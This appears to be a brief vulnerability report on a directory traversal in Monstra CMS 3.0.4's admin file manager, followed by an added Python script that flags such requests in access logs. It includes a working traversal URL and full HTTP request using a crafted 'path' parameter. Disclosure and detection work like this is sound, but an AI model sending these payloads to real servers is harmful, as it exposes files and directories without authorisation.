Monstra 3.0.4 directory browsing

Visit: http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./

Any directory can be traversed this way.

Request:
```
GET /monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./.......//./.......//./.......//./ HTTP/1.1
Host: 172.16.173.238
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=ph583h01pp9m9pbbi3of3bipm5; _ga=GA1.1.292621617.1535549034; _gid=GA1.1.1816700239.1535549034
Connection: close
Upgrade-Insecure-Requests: 1
```
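An added detection example (not part of the original post): it scans web access logs for `filesmanager` requests whose `path` value contains dot-only or empty segments, as in the request above, or does not start under `uploads/`. The log lines, client addresses and the assumption that legitimate values stay under `uploads/` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; only the path value on line 2 is from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2018:10:00:01 +0000] "GET /monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/ HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Sep/2018:10:02:17 +0000] "GET /monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/.......//./.......//./.......//./ HTTP/1.1" 200 9876',
    '192.0.2.10 - - [01/Sep/2018:10:03:00 +0000] "GET /monstra-3.0.4/admin/index.php?id=filesmanager&path=uploads/images/ HTTP/1.1" 200 4301',
    '192.0.2.10 - - [01/Sep/2018:10:04:12 +0000] "GET /monstra-3.0.4/admin/index.php?id=pages HTTP/1.1" 200 7000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DOT_SEGMENT = re.compile(r'^\.+$')  # ".", "..", "......." and so on

def suspicious_path(path_value):
    """Return the reasons a filesmanager path value looks like traversal."""
    value = path_value.replace('\\', '/')
    segments = value.split('/')
    if segments and segments[-1] == '':
        segments = segments[:-1]  # a single trailing slash is normal
    reasons = []
    if any(DOT_SEGMENT.match(s) for s in segments):
        reasons.append('dot-only segment')
    if any(s == '' for s in segments):
        reasons.append('empty segment')
    # Assumption: legitimate file-manager browsing stays under uploads/.
    if value != 'uploads' and not value.startswith('uploads/'):
        reasons.append('outside uploads/')
    return reasons

def scan(lines):
    """Return (line_number, path_value, reasons) for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)  # percent-decodes values once
        if query.get('id', [''])[0] != 'filesmanager':
            continue
        for value in query.get('path', []):
            reasons = suspicious_path(value)
            if reasons:
                hits.append((n, value, reasons))
    return hits

if __name__ == '__main__':
    for n, value, reasons in scan(SAMPLE_LOG):
        print(f'line {n}: path={value!r} -> {", ".join(reasons)}')
```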
Original article: http://blog.51cto.com/13770310/2173957